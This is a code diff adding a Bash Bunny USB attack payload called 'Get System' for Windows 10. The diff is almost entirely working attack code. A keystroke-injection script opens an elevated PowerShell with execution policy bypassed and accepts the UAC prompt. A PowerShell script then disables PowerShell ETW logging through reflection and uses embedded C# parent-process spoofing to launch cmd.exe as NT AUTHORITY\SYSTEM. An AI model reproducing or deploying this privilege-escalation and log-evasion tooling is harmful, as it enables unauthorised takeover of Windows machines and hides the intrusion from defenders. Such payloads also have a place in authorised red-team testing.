Execution - Get System (#446)

Disable "PowerShell" logging
Check if current process have "Administrator" privilege
Check "SeDebugPrivilege" policy
Retrieves the processes belonging to the "SYSTEM" account
For each system PID, test to obtain the "SYSTEM" account via the parent process

payloads/library/execution/Get-System/payload.ps1

@@ -0,0 +1,36 @@
+#
+# Author:           TW-D
+# Version:          1.0
+#
+
+# Disable "PowerShell" logging
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Check if current process have "Administrator" privilege
+If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
+
+    # Check "SeDebugPrivilege" policy
+    $whoami_output = WHOAMI /PRIV | Select-String -Pattern "SeDebugPrivilege"
+    If ( ($whoami_output -clike "*Activ*") -Or ($whoami_output -clike "*Enabled*") ) { # For French/English OS
+
+        # Retrieves the processes belonging to the "SYSTEM" account
+        $system_processes = (Get-Process -IncludeUserName | ? {$_.UserName -like "*SYST*"}).Id # For English/French OS
+
+        # For each system PID, test to obtain the "SYSTEM" account via the parent process
+        Import-Module -Name ".\psgetsys.ps1"
+        $system_processes | ForEach-Object {
+            [MyProcess]::CreateProcessFromParent($_, "C:\WINDOWS\system32\cmd.exe", "/K ECHO Success > .\hak5_execution.txt")
+            Start-Sleep -Seconds 5
+            $success = Test-Path -Path "C:\WINDOWS\system32\hak5_execution.txt"
+            If ($success) {
+                # Cleanup
+                Remove-Item -Path "C:\WINDOWS\system32\hak5_execution.txt" -Force
+                Exit
+            }
+        }
+
+    }
+
+}

payloads/library/execution/Get-System/payload.txt

@@ -0,0 +1,78 @@
+#!/bin/bash
+#
+# Title:            Get System Account
+#
+# Description:      Spoofing "NT AUTHORITY\SYSTEM" via parent process using PowerShell and embedded C Sharp
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Execution
+# Target:           Microsoft Windows 10
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# The target user must belong to the 'Administrator' group.
+# The target user have 'SeDebugPrivilege' token in 'Administrator' mode (by default).
+#
+# TOOLS
+# ===============
+# https://github.com/decoder-it/psgetsystem
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q GUI r
+Q DELAY 5000
+Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 1500
+Q CTRL-SHIFT ENTER
+Q DELAY 5000
+Q LEFTARROW
+Q DELAY 3000
+Q ENTER
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 2000
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1"
+Q ENTER
+
+######## FINISH ########
+
+LED FINISH

payloads/library/execution/Get-System/psgetsys.ps1

@@ -0,0 +1,162 @@
+#Simple powershell/C# to spawn a process under a different parent process 
+#usage: import-module psgetsys.ps1;  [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)
+$mycode = @"
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+
+public class MyProcess
+{
+    [DllImport("kernel32.dll")]
+    static extern uint GetLastError();
+    
+	[DllImport("kernel32.dll")]
+    [return: MarshalAs(UnmanagedType.Bool)]
+    static extern bool CreateProcess(
+        string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
+        ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags,
+        IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo,
+        out PROCESS_INFORMATION lpProcessInformation);
+
+    [DllImport("kernel32.dll", SetLastError = true)]
+    [return: MarshalAs(UnmanagedType.Bool)]
+    private static extern bool UpdateProcThreadAttribute(
+        IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue,
+        IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
+
+    [DllImport("kernel32.dll", SetLastError = true)]
+    [return: MarshalAs(UnmanagedType.Bool)]
+    private static extern bool InitializeProcThreadAttributeList(
+        IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
+
+    [DllImport("kernel32.dll", SetLastError = true)]
+    [return: MarshalAs(UnmanagedType.Bool)]
+    private static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
+
+    [DllImport("kernel32.dll", SetLastError = true)]
+    static extern bool CloseHandle(IntPtr hObject);
+    
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+    struct STARTUPINFOEX
+    {
+        public STARTUPINFO StartupInfo;
+        public IntPtr lpAttributeList;
+    }
+
+    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+    struct STARTUPINFO
+    {
+        public Int32 cb;
+        public string lpReserved;
+        public string lpDesktop;
+        public string lpTitle;
+        public Int32 dwX;
+        public Int32 dwY;
+        public Int32 dwXSize;
+        public Int32 dwYSize;
+        public Int32 dwXCountChars;
+        public Int32 dwYCountChars;
+        public Int32 dwFillAttribute;
+        public Int32 dwFlags;
+        public Int16 wShowWindow;
+        public Int16 cbReserved2;
+        public IntPtr lpReserved2;
+        public IntPtr hStdInput;
+        public IntPtr hStdOutput;
+        public IntPtr hStdError;
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    internal struct PROCESS_INFORMATION
+    {
+        public IntPtr hProcess;
+        public IntPtr hThread;
+        public int dwProcessId;
+        public int dwThreadId;
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    public struct SECURITY_ATTRIBUTES
+    {
+        public int nLength;
+        public IntPtr lpSecurityDescriptor;
+        public int bInheritHandle;
+    }
+
+	public static void CreateProcessFromParent(int ppid, string command, string cmdargs)
+    {
+        const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
+        const uint CREATE_NEW_CONSOLE = 0x00000010;
+		const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
+		
+
+        var pi = new PROCESS_INFORMATION();
+        var si = new STARTUPINFOEX();
+        si.StartupInfo.cb = Marshal.SizeOf(si);
+        IntPtr lpValue = IntPtr.Zero;
+        Process.EnterDebugMode();
+        try
+        {
+            
+            var lpSize = IntPtr.Zero;
+            InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
+            si.lpAttributeList = Marshal.AllocHGlobal(lpSize);
+            InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, ref lpSize);
+            var phandle = Process.GetProcessById(ppid).Handle;
+            Console.WriteLine("[+] Got Handle for ppid: {0}", ppid); 
+            lpValue = Marshal.AllocHGlobal(IntPtr.Size);
+            Marshal.WriteIntPtr(lpValue, phandle);
+            
+            UpdateProcThreadAttribute(
+                si.lpAttributeList,
+                0,
+                (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
+                lpValue,
+                (IntPtr)IntPtr.Size,
+                IntPtr.Zero,
+                IntPtr.Zero);
+            
+            Console.WriteLine("[+] Updated proc attribute list"); 
+            var pattr = new SECURITY_ATTRIBUTES();
+            var tattr = new SECURITY_ATTRIBUTES();
+            pattr.nLength = Marshal.SizeOf(pattr);
+            tattr.nLength = Marshal.SizeOf(tattr);
+            Console.Write("[+] Starting " + command  + "...");
+			var b= CreateProcess(command, cmdargs, ref pattr, ref tattr, false,EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref si, out pi);
+			Console.WriteLine(b+ " - pid: " + pi.dwProcessId+ " - Last error: "  +GetLastError() );
+			
+        }
+        finally
+        {
+            
+            if (si.lpAttributeList != IntPtr.Zero)
+            {
+                DeleteProcThreadAttributeList(si.lpAttributeList);
+                Marshal.FreeHGlobal(si.lpAttributeList);
+            }
+            Marshal.FreeHGlobal(lpValue);
+            
+            if (pi.hProcess != IntPtr.Zero)
+            {
+                CloseHandle(pi.hProcess);
+            }
+            if (pi.hThread != IntPtr.Zero)
+            {
+                CloseHandle(pi.hThread);
+            }
+        }
+    }
+
+}
+"@
+ Add-Type -TypeDefinition $mycode
+
+#Autoinvoke?
+ $cmdargs=""
+if($args.Length -eq 3)
+{
+  $cmdargs= $args[1] + " " + $args[2]
+}
+
+#[MyProcess]::CreateProcessFromParent($args[0],$args[1],$cmdargs)